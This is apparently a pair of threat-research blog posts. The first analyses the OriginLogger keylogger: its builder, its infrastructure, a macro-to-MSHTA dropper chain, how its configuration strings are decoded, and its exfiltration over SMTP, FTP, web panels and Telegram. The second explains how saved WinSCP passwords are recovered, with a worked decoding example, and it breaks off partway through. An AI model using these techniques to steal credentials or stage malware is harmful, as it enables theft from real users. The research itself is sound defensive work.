During my search, I stumbled across a YouTube video posted in 2018 (before Agent Tesla closed up shop) by a person selling “fully undetectable” (FUD) tools. This person showed off the OriginLogger tools with a link to buy them from a known site that traffics in malware, exploits and the like.

OriginLogger feature highlights include: Powerful keyboard hook (detects all keyboard strokes. It does not work with the timer, it hook directly). Origin Logger has support all languages (Chinese, Greek, Latins Etc.); Web Panel (You can monitoring your logs on your hosting. We are providing our panel scripts and we can help you for installation); colored Log (Origin Logger saves logs in HTML colored texts make reading easier); Smart Logger (with this feature, the keylogger starts to work only in the windows where the words you specify are detected).
Figure 1. OriginLogger feature highlights (Source: screenshots of the OriginLogger sale page from a YouTube video on OriginLogger).
Full OriginLogger feature list includes the following: multilanguage support, 3 different delivery: PHP, SMTP and FTP, keylogger, colored log, screenshot logger, multi file binder, clipboard logger, smartlogger, password recovery, web panel, 7/24 support, fake message, autobuy, stable and fast, pure code, all windows OS supported, UAC bypass: WIN 7/8/10, assembly & icon option
Figure 2. OriginLogger feature list.

Additionally, they showed both the web panel and the malware builder.

Screenshot of the Origin Logger web panel, with the "keystrokes" option selected. The panel shows where you can view and delete logs and includes info on Server Time, HWID, Machine Name, Log, IP Address. It offers actions including view/delete, copy, CSV, Excel, PDF and Print
Figure 3. OriginLogger web panel (Source: OriginLogger YouTube video).
OriginLogger builder. The screenshot shows selections including Keyboard Logger (time), Clipboard Logger, Delete Backspaces, Smart Logger (which allows the user to input specific words such as facebook, twitter, gmail, etc.), Screenshot Logger (time)
Figure 4. OriginLogger builder.

The image of the builder shown in Figure 4 was particularly interesting to me as it provided a default string – facebook, twitter, gmail, instagram, movie, skype, porn, hack, whatsapp, discord – that might be unique to this application. Sure enough, a content search on VirusTotal shows one matching file (SHA256: 595a7ea981a3948c4f387a5a6af54a70a41dd604685c72cbd2a55880c2b702ed) uploaded on May 17, 2022.

Searching on VirusTotal for the string "facebook, twitter, gmail, instagram, movie, skype, porn, hack, whatsapp, discord" leads to the file SHA256: 595a7ea981a3948c4f387a5a6af54a70a41dd604685c72cbd2a55880c2b702ed as shown
Figure 5. VirusTotal search for string.

Downloading and attempting to run this file resulted in errors due to missing dependencies; however, knowing the builder’s filename, OriginLogger.exe, allowed me to expand the search and locate a Zip archive (SHA256: b22a0dd33d957f6da3f1cd9687b9b00d0ff2bdf02d28356c1462f3dbfb8708dd) containing all of the files required to run OriginLogger.

bundled files in the Zip archive include OriginLogger.exe, Updater.exe, NetCore.dll, Mono.Cecil.dll, settings.ini, eula.html, profile.origin
Figure 6. Bundled files in Zip archive.

The settings.ini file contains the configuration the builder will use, and in Figure 7 we can see the previous search string listed under SmartWords.

Settings.ini in OriginLogger includes logsettings such as Delivery, remember, keylogger, grabip, Log, ScreenLogger, screeninterval, Clipboard, Backspace, email, toemail, password, smtp, port, SSL, attach, ftphost, ftpuser, ftppassword, URL, UrlKey, istor, telegram_api, telegram_chatid, SmartLogger, SmartWords, smartLoggerType
Figure 7. OriginLogger Builder settings.ini file.
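For anyone triaging a similar bundle, a value like SmartWords can be pulled out of an INI file with Python's standard configparser module. In the sketch below the key names follow Figure 7, but the section name and every value other than the SmartWords string are assumptions, since the full file contents are not reproduced here.

```python
import configparser

# Hypothetical excerpt: key names come from the figure, but the section name
# and all values other than the SmartWords string are assumptions.
SAMPLE_INI = """
[settings]
Delivery=smtp
SmartLogger=1
SmartWords=facebook, twitter, gmail, instagram, movie, skype, porn, hack, whatsapp, discord
"""


def smart_words(ini_text: str) -> list[str]:
    """Return the SmartWords entries from the first section that defines them."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(ini_text)
    for section in parser.sections():
        # configparser treats option names case-insensitively by default.
        if parser.has_option(section, "SmartWords"):
            return [w.strip() for w in parser.get(section, "SmartWords").split(",")]
    return []


print(smart_words(SAMPLE_INI))
```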

The file profile.origin contains the embedded username/password that a customer registers with when purchasing OriginLogger.

Screenshot of the OriginLogger builder login screen, including fields for email and password and option to remember password.
Figure 8. OriginLogger builder login screen.

Amusingly, if you flip around the values in the profile file, the plaintext password is revealed.

Red arrows indicate which two values can be swapped in the profile.origin file to reveal the plaintext password.
Figure 9. Contents of profile.origin file.
Screenshot of the OriginLogger builder login screen, showing the results of flipping values in the file as shown in Figure 9. The threat actor's password is revealed in plaintext in the e-mail field, while the email is obfuscated in the password field.
Figure 10. OriginLogger builder login screen with threat actor password revealed in plaintext.

When a user logs in, the builder attempts to authenticate with the OriginLogger servers to validate the subscription.

At this point, I had two versions of the builder. The first one (b22a0d*), contained in the Zip file, was compiled Sept. 6, 2020. The other, which contained the SmartWords string (595a7e*), was compiled on June 29, 2022, just about two years after the first.

The later version makes its authentication request over TCP/3345 to IP 23.106.223[.]46. Since March 3, 2022, this IP has resolved to the domain originpro[.]me. This domain has resolved to the following IP addresses:

23.106.223[.]46
204.16.247[.]26
31.170.160[.]61

The second IP, 204.16.247[.]26, stands out because it is also associated with these other OriginLogger-related domains:

originproducts[.]xyz
origindproducts[.]pw
originlogger[.]com

Things get more interesting when looking at the older builder. This one attempts to reach out to a different IP address for the authentication.

The older version of OriginLogger reaches out to 74.118.138[.]76 for authentication as shown in the pcap
Figure 11. PCAP showing remote IP address.
Unlike the IP addresses associated with originpro[.]me, 74.118.138[.]76 does not resolve to any OriginLogger domains directly but instead resolves to 0xfd3[.]com. Pivoting on this domain shows it contains both DNS MX and TXT records for mail.originlogger[.]com.

Beginning around March 7, 2022, the domain in question began resolving to IP 23.106.223[.]47, whose last octet is one higher than that of 23.106.223[.]46, the IP used for originpro[.]me.

These two IP addresses have shared multiple SSL certificates:

SHA1 | Serial Number | Common Name | IPs Observed
2dec9fdf91c3965960fecb28237b911a57a543e2 | 38041735159378560318847695768150611562 | WIN-4K804V6ADVQ | 23.106.223[.]46, 23.106.223[.]47
7a7e732229287c1d53a360e08201616179217117 | 133152806647474295963986900899009859692 | WIN-4K804V6ADVQ | 23.106.223[.]46, 23.106.223[.]47, 74.118.138[.]76, 204.16.247[.]26
3b3cf8039b779d93677273e09961203ffaac2d6f | 89480234209393487842197137895395039274 | WIN-4K804V6ADVQ | 23.106.223[.]46, 23.106.223[.]47, 74.118.138[.]76, 204.16.247[.]26

Table 1. Shared SSL certificates.
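The pivot in Table 1 can be expressed as a small set operation. The sketch below transcribes the certificate-to-IP observations from the table, finds the addresses that presented every certificate and checks that they are adjacent. The `refang` helper and the variable names are hypothetical, and the defanged addresses are converted only so that Python's ipaddress module can parse them.

```python
import ipaddress

# Certificate SHA1 -> IPs observed, transcribed from Table 1 (defanged in the source).
CERT_IPS = {
    "2dec9fdf91c3965960fecb28237b911a57a543e2": ["23.106.223[.]46", "23.106.223[.]47"],
    "7a7e732229287c1d53a360e08201616179217117": [
        "23.106.223[.]46", "23.106.223[.]47", "74.118.138[.]76", "204.16.247[.]26"],
    "3b3cf8039b779d93677273e09961203ffaac2d6f": [
        "23.106.223[.]46", "23.106.223[.]47", "74.118.138[.]76", "204.16.247[.]26"],
}


def refang(ip: str) -> ipaddress.IPv4Address:
    """Turn a defanged address such as '1.2.3[.]4' into an IPv4Address object."""
    return ipaddress.IPv4Address(ip.replace("[.]", "."))


ip_sets = [{refang(ip) for ip in ips} for ips in CERT_IPS.values()]
on_every_cert = sorted(set.intersection(*ip_sets))
print("IPs presenting every certificate:", [str(ip) for ip in on_every_cert])

# Adjacent addresses differ by exactly one when compared as integers.
first, second = on_every_cert
print("Adjacent:", int(second) - int(first) == 1)
```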

The RDP login screens for both of the servers beginning with IP 23.106.223.X show a Windows Server 2012 R2 server with multiple accounts.

RDP login screen for 23.106.223[.]46 shows a Windows Server 2012 R2 server with multiple accounts - administrator, ftpuser and postgres
Figure 12. RDP login screen for 23.106.223[.]46.
When further searching for this domain, I came across the GitHub profile for user 0xfd3, which contains the two repositories shown in Figure 13.

The two GitHub repositories associated with user 0xfd3 shown in the screenshot are OutlookPasswordRecovery and Chrome-Password-Recovery
Figure 13. User 0xfd3 GitHub.

I’ll circle back to these later in the blog when looking at the code, but (spoiler alert) they are also used in OriginLogger.

Dropper Lure

Before diving into the malware, I’ll quickly cover the dropper that led to the sample I set out to analyze. As both Agent Tesla and OriginLogger are commercialized keyloggers, the initial droppers will vary greatly between campaigns and should not be considered unique to either. I present the below as a real-world example of an attack dropping OriginLogger and show that they can be quite convoluted and obfuscated.

The initial lure document is a Microsoft Word file (SHA256: ccc8d5aa5d1a682c20b0806948bf06d1b5d11961887df70c8902d2146c6d1481). When opened, this document displays a photo of a passport for a German citizen, along with a credit card. I’m not quite sure how enticing this would be as a lure for a normal user, but either way, you’ll note the inclusion of numerous Excel Worksheets below the image, as shown in Figure 14.

The Microsoft Word document displays a photo of a passport for a German citizen, along with a credit card. Numerous Excel worksheets appear below the image.
Figure 14. Lure document.

Each of these sheets is contained in a separate embedded Excel Workbook, and all of them are exactly the same:

dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet1.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet10.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet2.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet3.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet4.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet5.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet6.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet7.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet8.xls
dc8b81e2f3ea59735eb1887128720dab292f73dfc3a96b5bc50824c1201d97cf Microsoft_Excel_97-2003_Worksheet9.xls

Within each Workbook is a singular macro that simply saves a command to execute at the following location:

C:\Users\Public\olapappinuggerman.js

Screenshot shows the macro contained within each Excel Workbook in the malicious Word document. This macro saves a command to execute at C:\Users\Public\olapappinuggerman.js
Figure 15. Excel VBA macro.

Once run, this will download and execute via MSHTA the contents of the file at hxxp://www.asianexportglass[.]shop/p/25.html. A screenshot of the website is shown in Figure 16.

A minimalist but legitimate-appearing website at hxxp://www.asianexportglass[.]shop
Figure 16. Website to appear legitimate.
This file contains an embedded obfuscated script in the middle of the document as a comment.

Hidden in a comment in the html of a legitimate-appearing website is an embedded obfuscated script.
Figure 17. Website hidden comment.

Unescaping the script reveals the code shown in Figure 18, which downloads the next payload from a BitBucket snippet (hxxps://bitbucket[.]org/!api/2.0/snippets/12sds/pEEggp/8cb4e7aef7a46445b9885381da074c86ad0d01d6/files/snippet.txt) and establishes persistence with a scheduled task named calsaasdendersw that runs every 83 minutes and uses MSHTA again to execute the script contained within hxxp://www.coalminners[.]shop/p/25.html.

The unescaped script shown downloads the next payload from a BitBucket snippet and establishes persistence with a scheduled task that runs every 83 minutes and uses MSHTA to execute a script.
Figure 18. Unescaped script.

The snippet hosted on the BitBucket website contains further obfuscated PowerShell code and two binaries encoded and compressed.

The first of the two files (SHA256: 23fcaad34d06f748452d04b003b78eb701c1ab9bf2dd5503cf75ac0387f4e4f8) is a C# reflective loader using CSharp-RunPE. This tool is used to hollow out a process and inject another executable inside of it; in this case, the keylogger payload will be placed inside the aspnet_compiler.exe process.

PowerShell command. The command shown begins with [Reflection.Assembly]
Figure 19. PowerShell command to execute method contained in dotNet assembly.
Note the projFUD.PA class that the Execute method is called from. Morphisec released a blog in 2021 called “Revealing the Snip3 Crypter, a highly evasive RAT loader,” where they analyze a crypter-as-a-service and fingerprint the crypter’s author using this artifact.

The second of the two files (SHA256: cddca3371378d545e5e4c032951db0e000e2dfc901b5a5e390679adc524e7d9c) is the OriginLogger payload.

OriginLogger Configuration

As previously stated, the original intention of this analysis was to automate and extract configuration-related details from the keylogger. To achieve this, I started by looking at how the configuration-related strings are used.

I won’t be diving into any of the actual functionality of the malware as it’s fairly standard and mirrors analysis of older Agent Tesla variants. Just as the threat actors’ advertisements state, the malware uses tried and true methods and includes the ability to keylog, steal credentials, take screenshots, download additional payloads, upload your data in a myriad of ways and attempt to avoid detection.

To start extracting configuration-related details, I needed to figure out how the user-supplied data is stored in the malware; it turned out to be straightforward. The builder will take the dynamic string values and concatenate them into a giant blob of text which is then encoded and stored in a byte array to be decoded at runtime. Once the malware runs and hits a particular function that needs a string, such as the HTTP address to upload screenshots to, it will pass the offset and string length to a function that will then carve out the text at that location within the blob.

To illustrate, below you can see the decoding logic used for the main blob of text.

The decoding logic used for OriginLogger's main blob of text.
Figure 20. OriginLogger plaintext blob decoding.

Each byte is XOR’d by the index of the byte within the byte array, and again XOR’d by the value 170 to reveal the plaintext.
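The decoding step described above can be sketched in a few lines of Python. This is a minimal illustration, not the malware's actual code: the function names are hypothetical, and wrapping the index to eight bits is an assumption about how the byte-sized XOR behaves once the index exceeds 255.

```python
def decode_blob(encoded: bytes, key: int = 170) -> bytes:
    """XOR each byte with its index (wrapped to 8 bits, an assumption)
    and then with the constant 170 described in the text."""
    return bytes(b ^ (i & 0xFF) ^ key for i, b in enumerate(encoded))


def encode_blob(plain: bytes, key: int = 170) -> bytes:
    """XOR is its own inverse, so encoding is the same operation."""
    return decode_blob(plain, key)


# Round trip on a made-up string (not taken from a real sample).
sample = encode_blob(b"hypothetical-config-string")
print(decode_blob(sample))
```

Because both XOR operations are reversible, the same routine serves as encoder and decoder, which is convenient when building test data for an extractor.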

For each sample generated by the builder, this blob of text will differ depending on what’s configured, so offsets and positioning will change. Looking at the raw text shown in Figure 21 is helpful, but without splicing it up, it becomes hard to determine where the boundaries end or begin.

Raw plaintext blob used by OriginLogger to store user-supplied data.
Figure 21. Plaintext blob.

It also does not help when it comes time to analyze the malware, as you won’t be able to discern when or where something is used. To figure this next piece out, I needed to look at how OriginLogger handles the splicing.

Below you can see the function responsible for carving out the string, followed by the beginning of the individual methods containing the offset and length.

The screenshot shows the function responsible for carving out the string, followed by the beginning of the individual methods containing the offset and length.
Figure 22. OriginLogger string functions.

In this case, if the B() method is called at some point by the malware, it will pass 2, 2, 27 to the obfuscated nameless function at the top of the image. The first integer is used for the array index where the decoded string will be stored. The second (offset) and third (length) integers are then passed to the GetString function to obtain the text. For this particular entry, the resulting value – <font color="#00b1ba"><b>[ – is used during the creation of the HTML page it uploads to display the stolen data.
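As a rough sketch of the splicing just described, the following Python carves strings out of an already decoded blob using (array index, offset, length) triples. The function name, the sample blob and the triple are hypothetical, and UTF-8 is assumed as the text encoding.

```python
from typing import Dict, Iterable, Tuple


def carve_strings(blob: bytes,
                  lookups: Iterable[Tuple[int, int, int]]) -> Dict[int, str]:
    """Return {array_index: text} for each (array_index, offset, length)."""
    table: Dict[int, str] = {}
    for index, offset, length in lookups:
        # Slice the decoded blob exactly as the offset/length pair dictates.
        chunk = blob[offset:offset + length]
        table[index] = chunk.decode("utf-8", errors="replace")
    return table


# Made-up blob and lookup triple, for illustration only.
decoded = b"xxhello world"
print(carve_strings(decoded, [(2, 2, 5)]))
```

Keeping the array index alongside each carved string makes it possible to map a decoded value back to the method that requests it.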

Knowing how the string parsing works, I could then automate the extraction of these strings. To start, it helps to look at the underlying intermediate language (IL) assembly instructions.

The underlying OriginLogger IL assembly instructions reveal three ldc.i4.X instructions that create a framework that can then be used to match all of the corresponding functions in the binary for parsing
Figure 23. OriginLogger IL instructions for string function.

For each of these lookups, the structure of the function block will remain the same. At index 6-8 in Figure 23, you will see three ldc.i4.X instructions where X dictates an integer value that will be pushed onto the stack before calling the previously described splicing function. This overall structure creates a framework that can then be used to match all of the corresponding functions in the binary for parsing.

Leveraging this, I wrote a script to identify the encoded byte array, determine the XOR values and then splice up the decoded blob in the same fashion the malware uses it. With this, you can scroll through the decoded strings and look for things of interest. Once something is identified, knowing the offset and subsequent function name, you can pivot into the part of the malware that leverages them.

Example of OriginLogger decoded strings. Includes Index, Offset, Count, etc.
Figure 24. OriginLogger decoded strings.

From here, I started renaming the obfuscated methods to reflect their actual values, which made analysis easier on the eyes.

Example of renaming obfuscated methods to reflect their actual values.
Figure 25. OriginLogger FTP upload function.

It should be noted that the same string deobfuscation can be achieved by using de4dot and its dynamic string decryption feature by specifying the string types as delegate and identifying the tokens of interest. This works extremely well for single file analysis.

Recall that I mentioned in the OriginLogger Builder section of this blog that I’d circle back to the GitHub repositories of the 0xfd3 user. Take a look in Figure 26 at the Chrome Password Recovery code uploaded in March 2020 after OriginLogger took Agent Tesla’s prominence in the keylogger world.

Code from user 0xfd3's "Chrome Password Recovery" GitHub repository. Methods include: Chrome, Opera, Yandex, 360 Browser, Comodo Dragon, CoolNovo, SRWare Iron, Torch Browser and Brave Browser.
Figure 26. Chrome Password Recovery.

Compare Figure 26 to the code from the OriginLogger sample with renamed methods shown in Figure 27.

OriginLogger code with renamed methods, including: Opera, Comodo Dragon, Chrome, 360 Browser, Yandex, SRWare Iron, Torch Browser, Brave Browser, Iridium Browser, CoolNovo, 7Star, Epic Privacy Browser, Amigo, CentBrowser, CocCoc, Chedot, Elements Browser, Kometa, Sleipnir 6, Citrio.
Figure 27. OriginLogger Chrome password stealing function.

Look familiar? These types of similarities abound as OriginLogger has continued development where Agent Tesla left off.

Identifying OriginLogger Through Artifacts

Using this tooling, I extracted 1,917 different configurations, which gives insight into the exfiltration methods used and allows for clustering of samples based on the underlying infrastructure.

This is where I began to understand that what I was looking at wasn’t Agent Tesla but instead a different keylogger – OriginLogger. Two particular exfiltration methods that both showed multiple references to “origin” in some fashion led me to connect the dots.

For example, one of the URLs configured for a sample to upload keylogger and screenshot data to was hxxps://agusanplantation[.]com/new/new/inc/7a5c36cee88e6b.php. This URL is no longer active, so I started searching for historical information about it to understand what was on the receiving end of these HTTP POST requests. Plugging the domain into URLScan.io showed login pages for the panel in the same directory and, more importantly, that the OriginLogger web panel (SHA256: c2a4cf56a675b913d8ee0cb2db3864d66990e940566f57cb97a9161bd262f271) was observed on this host at the time of scanning four months ago.

URLScan.io results for the agusanplantation[.]com domain includes an observation of the OriginLogger web panel.
Figure 28. URLScan.io scan history for domain.
Similarly, one of the exfiltration methods is through Telegram bots. To utilize them, OriginLogger requires a Telegram bot token to be included so the malware can interact with it. This provides another unique opportunity to analyze the infrastructure in use. In this case, I can use the token to query Telegram with what equates to a whoami command and observe the names used by the bot creator. Below are a handful of examples showing relevant naming.

"id":2046248941,"is_bot":true,"first_name":"origin","username":"mailerdemon_bot"
"id":1731070785,"is_bot":true,"first_name":"@CodeOnce_bot","username":"PWORIGIN_bot"
"id":1644755040,"is_bot":true,"first_name":"ORIGINLOGGER","username":"softypaulbot"
"id":1620445910,"is_bot":true,"first_name":"ORIGINLOGS","username":"badboi450hbot"
"id":2081699912,"is_bot":true,"first_name":"Zara","username":"Zaraoriginbot"
"id":5054839999,"is_bot":true,"first_name":"Origin Poster","username":"origin_post_bot"
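The "whoami" query mentioned above corresponds to the Telegram Bot API's getMe method. The sketch below only builds the request URL and parses a response body, so it runs without network access. The helper names are hypothetical, and the sample response wraps one of the records listed above in the standard ok/result envelope.

```python
import json


def getme_url(token: str) -> str:
    """Build the Bot API getMe URL for a bot token taken from a config."""
    return f"https://api.telegram.org/bot{token}/getMe"


def bot_identity(response_text: str) -> dict:
    """Pull the naming fields out of a getMe response body."""
    payload = json.loads(response_text)
    if not payload.get("ok"):
        raise ValueError("Telegram reported an error for this token")
    result = payload["result"]
    return {key: result.get(key) for key in ("id", "first_name", "username")}


def mentions_origin(identity: dict) -> bool:
    """Flag bots whose display name or username contains 'origin'."""
    return any("origin" in str(identity.get(key) or "").lower()
               for key in ("first_name", "username"))


sample = ('{"ok":true,"result":{"id":2046248941,"is_bot":true,'
          '"first_name":"origin","username":"mailerdemon_bot"}}')
print(bot_identity(sample), mentions_origin(bot_identity(sample)))
```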

Malicious Infrastructure

Like other keyloggers that are commercially sold, OriginLogger is used by a wide variety of people for various malicious purposes around the globe. In the past, I’ve written about taking a deeper look at the victims of keyloggers and what analyzing their screenshots can reveal about the potential intentions of the attackers. In this blog post, I will summarize some observations of the data extracted from the corpus of OriginLogger samples I collected. Most samples had multiple exfiltration techniques configured and I’ll cover each one below.

SMTP is still the primary mechanism used for exfiltrating data and was identified in 1,909 samples. This is most likely because:

  • The traffic will blend in with normal user traffic better than other included protocols.
  • It’s relatively easy for attackers to obtain stolen e-mail accounts.
  • E-mail providers usually offer a large amount of storage space.

There were 296 unique e-mail recipient addresses for the stolen data and 334 unique e-mail account credentials used to send them.

FTP was configured in 1,888 samples using 56 unique FTP servers and 79 unique FTP accounts, with multiple accounts logging to different directories, likely based on different campaigns. Across the accessible servers, which were limited to 11 of the 56, there are 442 unique victims, with some victims being logged hundreds of times.

Web uploads to the OriginLogger panel followed closely behind and were configured in 1,866 samples, uploading to 92 unique URLs. When analyzing these URLs, the PHP file used for the upload showed a pattern of alphanumeric characters in the filename, with a couple of additional patterns presenting themselves in the directory structure. Looking into the source code of the web panel as shown in Figure 29 shows that the PHP filename is an MD5 value of some random bytes and is placed in the /inc/ (incoming) directory.

Source code for setup.php shows that the PHP filename is an MD5 value of some random bytes and is placed in the /inc/ directory.
Figure 29. OriginLogger source code for setup.php.

Keep in mind that many keylogger purchasers may not have much technical experience and tend to use a “full service” vendor that creates everything for them so that all they are required to do is distribute the keylogger. I suspect this is a reason for a lot of the URIs having similar structures. For example, the structure http://<ipaddress>/<name>/inc/<md5>.php is repeated throughout, and the first level of the directory shows values unlikely to be generated automatically – possibly account-related:

b0ss/inc
rich/inc
divine/inc
ma2on/inc
darl/inc
jboy/inc
newmoney/inc

Likewise, this directory structure changes the inc to mawa and prepends webpanel to the name:

webpanel-roth/mawa
webpanel-qwerty/mawa
webpanel-dawn/mawa
webpanel-charles/mawa
webpanel-muti/mawa
webpanel-ghul/mawa
webpanel-reza/mawa
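For clustering, the two directory layouts above can be matched with a single regular expression. This is a sketch under assumptions: the pattern and function name are hypothetical, the 192.0.2.x addresses are documentation placeholders, and the filename is accepted as hexadecimal of any length because the example URL earlier in this post uses a name shorter than a full MD5.

```python
import re
from typing import Optional, Tuple
from urllib.parse import urlsplit

# <name>/inc/<hex>.php or <name>/mawa/<hex>.php at the end of the path.
PANEL_PATH = re.compile(
    r"/(?P<name>[^/]+)/(?P<dir>inc|mawa)/(?P<file>[0-9a-f]+)\.php$"
)


def panel_account(url: str) -> Optional[Tuple[str, str]]:
    """Return (first-level name, upload directory) or None if no match."""
    match = PANEL_PATH.search(urlsplit(url).path)
    if match is None:
        return None
    return match.group("name"), match.group("dir")


print(panel_account("http://192.0.2.10/b0ss/inc/7a5c36cee88e6b.php"))
print(panel_account("http://192.0.2.11/webpanel-roth/mawa/0123abcd.php"))
```

Grouping configurations by the returned name is one way to surface the possibly account-related values listed above.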

For the last exfiltration method, we have Telegram identified in 1,732 samples with 181 unique Telegram bots receiving the stolen data. In addition to being able to issue a whoami for the bot, we’re able to query for information related to the channels where stolen information was uploaded. The most prominent of the channels are below with the details currently in use:

Count Channel Bio Owner Bot Name
41 Invest in bitcoin now and attain financial freedom Alaa Ahmed obomike_bot
25 Free Cannabis Cry_ptoSand sales3w7_bot, oasisx_bot, valiat073_bot
21 Atrium Investment Ltd: We Help You ACHIEVE YOUR LIFE GOALS Doris E. Athey Tino08Bot
20 Self Discipline, Consistency and humanity. Lucas Grayson Odion2023bot
18 Come Closer Anthony Forbes Anthonyforbes2023bot
14 Think it, Code It CodeOnce DeSpartan PWORIGIN_bot
12 Dream cha$er 4L Lurgard da Great johnwalkkerBot
11 coder..no system is safe.. Private crypt 100$..knowledge is power ☠️The Devil☠️( do not disturb )) Skiddoobot
10 PhD Engineering Alexander Macbill swft_bot

Table 2. Prominent Channels

Finally, one feature that is not utilized very often is the ability for OriginLogger to download an additional payload after infecting the victim system. In the samples discussed here, only two were configured to download additional malware.

Conclusion

OriginLogger, much like its parent Agent Tesla, is a commoditized keylogger that shares many overlapping similarities and code, but it’s important to distinguish between the two for tracking and understanding. Commercial keyloggers have historically catered to less advanced attackers, but as illustrated in the initial lure document analyzed here, this does not make attackers any less capable of using multiple tools and services to obfuscate and make analysis more complicated. Commercial keyloggers should be treated with equal amounts of caution as would be used with any malware.

Luckily, in this instance, because of the similarities between the two aforementioned keyloggers, detections and protections carried over from one generation to the next – albeit with slightly inaccurate signature naming.

Palo Alto Networks customers receive protections from both OriginLogger and its predecessor malware Agent Tesla through Cortex XDR and the Next-Generation Firewall with cloud-delivered security services including WildFire and Advanced Threat Prevention.

Credential Gathering From Third-Party Software

Executive Summary

There is a constant debate between usability and security in the software world. Many third-party programs can make their users’ lives easier and save them time by storing their credentials. However, as it turns out, this convenience often comes at the price of poor security, causing the risk of password theft. Credentials gathered in this manner can then be used during an actual cyberattack.

In this article, we will explain the dangers of credential theft. We will examine some common third-party software scenarios related to credential gathering, looking into how passwords are stored, how they can be retrieved and how to monitor these actions based on real-world attack scenarios.

Cortex XDR customers are protected from such attacks using the Credential Gathering Protection Module released in Cortex 3.4 on Windows, Linux and macOS agents.

The Dangers of Credential Theft: How Attackers Can Expand Their Access

It is clear that credential theft is bad. However, it is important to emphasize the scale of the impact that credential theft can have.

Many people tend to use the same password in different programs and rarely change their passwords. When the time comes to modify their passwords, many people follow a predictable pattern.

Thus, when attackers can get a password from one source, they can try to use it against other resources, including some that are more protected. So, for every program A that is well secured, the user could use the same password or pattern on program B that is less secure – which could result in making program A less secure.

Furthermore, if it turns out that a person is using their operating system password in other less secure locations, a whole new world of possibilities is open to the attacker.

Let’s say, for example, that person X uses the same password for their Windows domain account and a Linux FTP file server. In this scenario, person X uses the common program WinSCP to manage their files on the file server. Although WinSCP advises that saving passwords isn’t recommended, person X accesses this file server every week, so they prefer to save time and save their password.

The red box highlights the "Save password" option in WinSCP, which is specifically listed as "not recommended."
Figure 1. Password saving is not recommended by WinSCP.

As we will demonstrate later in this blog, the user’s password can easily be retrieved from where WinSCP stores it. An attacker who can get a foothold on X’s personal computer can get their domain account password – only because it is being saved insecurely. This is on top of the fact that the password is valid for connecting to the file server. This file server may contain files with sensitive information to which the attacker now has access. From there, the attacker can use tools like BloodHound to estimate how far they can spread within an organization.

Credential Gathering in Practice

Software: WinSCP

WinSCP is a popular SFTP client and FTP client for Microsoft Windows that is used to copy files between local Windows computers and remote servers using FTP, FTPS, SCP and SFTP.

Tested version:

5.19.6 (Build 12002 2022-02-22)

Where are credentials stored?

WinSCP stores the encrypted user’s password under the registry key HKCU\software\martin prikryl\winscp 2\sessions\<session_name> in a value called Password.

How can the credentials be recovered?

WinSCP performs symmetric mathematical operations on the bits of the user’s passwords. It takes each byte of the password, computes the complement to 0xFF (11111111), and after that, XORs it with the byte 0xA3 (10100011).

The encryption process comprises finding the complement and performing the XOR one time. The password is then stored in the Password registry value. Since these mathematical operations are symmetric, all we need to do is perform the same two operations once again, in reverse order, to get the original value.

For example, let's take a commonly used password: Aa123456. This is how WinSCP will store this password: 1D3D6D6E6F68696A.
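The two operations can be reproduced in Python to confirm the example value. This is a minimal sketch of the per-byte transform as described here, with hypothetical function names. It covers only the password bytes and ignores the length and start-index bytes that WinSCP stores in front of them.

```python
XOR_KEY = 0xA3


def obfuscate(password: str) -> str:
    """Complement each byte to 0xFF, XOR it with 0xA3, return uppercase hex."""
    out = bytes(((~b) & 0xFF) ^ XOR_KEY for b in password.encode("ascii"))
    return out.hex().upper()


def deobfuscate(stored_hex: str) -> str:
    """Apply the two operations in reverse order: XOR first, then complement."""
    raw = bytes.fromhex(stored_hex)
    return bytes((b ^ XOR_KEY) ^ 0xFF for b in raw).decode("ascii")


print(obfuscate("Aa123456"))
print(deobfuscate("1D3D6D6E6F68696A"))
```

Since the complement is itself an XOR with 0xFF, the whole transform collapses to a single XOR with 0x5C, which is why no key material is needed to reverse it.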

In Figure 2, we see the steps to decrypt the password:

Steps to decrypt a password in WinSCP include performing the XOR with 0xA3 and finding the complement, as shown in the table.
Figure 2. Decrypting a password stored in WinSCP.

The password is saved along with the HostName and UserName. To get it from the Password registry value, we must find the index at which the password begins. This calculation is fairly simple: depending on the WinSCP version, the first or third byte of the registry value is the length of the concatenated username, hostname and password. The byte that follows the length is the start index, and its value must be multiplied by two. Both the length and the start index are encrypted in the same way.

The UserName and HostName are also saved on different registry values, so we know their length and value. All we do is decrypt the Password registry value from the index: start index + username length + hostname length to length, and we will get our password.

The screenshot shows how to decrypt the Password registry value from the index in WinSCP: start index + username length + hostname length to length. The result is the password.
Figure 3. Location of username, hostname and password, concatenated.

In the wild

We have seen the following script executed in multiple customer environments:

A suspicious PowerShell script that Unit 42 has observed in multiple environments. The decoded script attempts to decrypt WinSCP passwords.
Figure 4. Suspicious PowerShell with encoded command.
  • -enc stands for EncodedCommand, meaning that a base-64-encoded string is used as the command.
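When triaging a command line like this, an analyst can recover the script by reversing the encoding: PowerShell expects the EncodedCommand argument to be Base64 over UTF-16LE text. The helper names below are hypothetical, and the sample command is a harmless stand-in rather than the script from Figure 4.

```python
import base64


def decode_encoded_command(b64: str) -> str:
    """Base64-decode the argument and interpret the bytes as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse helper, handy for building test cases."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


encoded = encode_command("Get-Date")
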